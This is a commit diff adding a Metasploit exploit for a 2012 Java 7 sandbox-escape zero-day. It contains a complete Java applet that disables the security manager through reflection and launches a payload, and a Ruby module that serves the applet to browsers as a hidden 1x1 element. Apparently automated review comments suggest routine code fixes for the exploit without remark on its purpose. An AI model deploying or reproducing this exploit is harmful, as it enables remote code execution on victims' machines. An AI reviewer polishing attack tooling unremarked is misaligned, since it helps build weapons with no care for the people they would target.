
Added java_jre17_exec

commit 52ca1083c22de7022baf7dca8a1756909f803341 1 parent b0661a3
authored
BIN  data/exploits/CVE-2012-XXXX/Exploit.class
Binary file not shown
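--- /dev/null
+++ b/external/source/exploits/CVE-2012-XXXX/Exploit.java
@@ -0,0 +1,75 @@
+//
+// CVE-2012-XXXX Java 0day
+//
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
+
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.beans.Expression;
+import java.beans.Statement;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.Certificate;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+
+    public void disableSecurity()
+        throws Throwable
+    {
+        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
+        Permissions localPermissions = new Permissions();
+        localPermissions.add(new AllPermission());
+        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
+        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
+            localProtectionDomain
+        });
+        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
+        localStatement.execute();
+    }
+
+    private Class GetClass(String paramString)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[1];
+        arrayOfObject[0] = paramString;
+        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
+        localExpression.execute();
+        return (Class)localExpression.getValue();
+    }
+
+    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[2];
+        arrayOfObject[0] = paramClass;
+        arrayOfObject[1] = paramString;
+        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
+        localExpression.execute();
+        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
+    }
+
+    public void init()
+    {
+        try
+        {
+            disableSecurity();
+			Payload.main(null);               
+        }
+        catch(Throwable localThrowable)
+        {
+            localThrowable.printStackTrace();
+        }
+    }
+
+    public void paint(Graphics paramGraphics)
+    {
+        paramGraphics.drawString("Loading", 50, 25);
+    }
+}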
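Review bot: The header comment on the first lines identifies the issue only as `CVE-2012-XXXX`, and the same placeholder is baked into the directory name the Ruby module reads from (`data/exploits/CVE-2012-XXXX`), so both will need updating together once an identifier is assigned; a `// TODO: replace CVE-2012-XXXX with the assigned identifier (also in the module's data path)` line would keep that from being missed. `init()` catches `Throwable` and only prints the stack trace, which leaves the applet silently running on failure; a one-line comment stating that this fallback is intentional would make the intent clear to the next reader. The `Class` usages in `GetClass` and `SetField` are raw types, which is acceptable for the Java 7 target but will warn on newer compilers.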
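--- /dev/null
+++ b/modules/exploits/multi/browser/java_jre17_exec.rb
@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+		super( update_info( info,
+			'Name'          => 'Java 7 Applet Remote Code Execution',
+			'Description'   => %q{
+					This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
+				Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
+				no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
+				and	Firefox across different platforms.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        =>
+				[
+					'Unknown', # Vulnerability Discovery
+					'jduck', # metasploit module
+					'sinn3r', # metasploit module
+					'juan vazquez', # metasploit module
+				],
+			'References'    =>
+				[
+					#[ 'CVE', '' ],
+					#[ 'OSVDB', '' ],
+					[ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
+					[ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
+				],
+			'Platform'      => [ 'java', 'win', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows Universal',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'win'
+						}
+					],
+					[ 'Linux x86',
+						{
+							'Arch' => ARCH_X86,
+							'Platform' => 'linux'
+						}
+					]
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Aug 26 2012'
+			))
+	end
+
+
+	def on_request_uri( cli, request )
+		if not request.uri.match(/\.jar$/i)
+			if not request.uri.match(/\/$/)
+				send_redirect(cli, get_resource() + '/', '')
+				return
+			end
+
+			print_status("#{self.name} handling request")
+
+			send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+			return
+		end
+
+		paths = [
+			[ "Exploit.class" ]
+		]
+
+		p = regenerate_payload(cli)
+
+		jar  = p.encoded_jar
+		paths.each do |path|
+			1.upto(path.length - 1) do |idx|
+				full = path[0,idx].join("/") + "/"
+				if !(jar.entries.map{|e|e.name}.include?(full))
+					jar.add_file(full, '')
+				end
+			end
+			fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
+			data = fd.read(fd.stat.size)
+			jar.add_file(path.join("/"), data)
+			fd.close
+		end
+
+		print_status("Sending Applet.jar")
+		send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+		handler( cli )
+	end
+
+	def generate_html
+		html  = "<html><head></head>"
+		html += "<body>"
+		html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+		html += "</applet></body></html>"
+		return html
+	end
+
+end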
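Review bot: In `on_request_uri` the class file is opened with `File.open`, read, and closed only after `jar.add_file` returns, with no `ensure`, so an exception from `add_file` leaks the descriptor on the server side; `data = File.binread(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path))` replaces the three `fd` lines and closes the file itself. The `1.upto(path.length - 1)` loop inside `paths.each` is a no-op for the single-element path declared above it, which is fine but deserves a comment such as `# create parent directory entries only for nested paths` so a reader does not look for a bug there. The `References` list still carries commented-out `CVE` and `OSVDB` placeholders and the data directory is named `CVE-2012-XXXX`; both should be filled in once the identifier is assigned, and the `%q{}` description on the first lines has a stray tab between `and` and `Firefox`.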
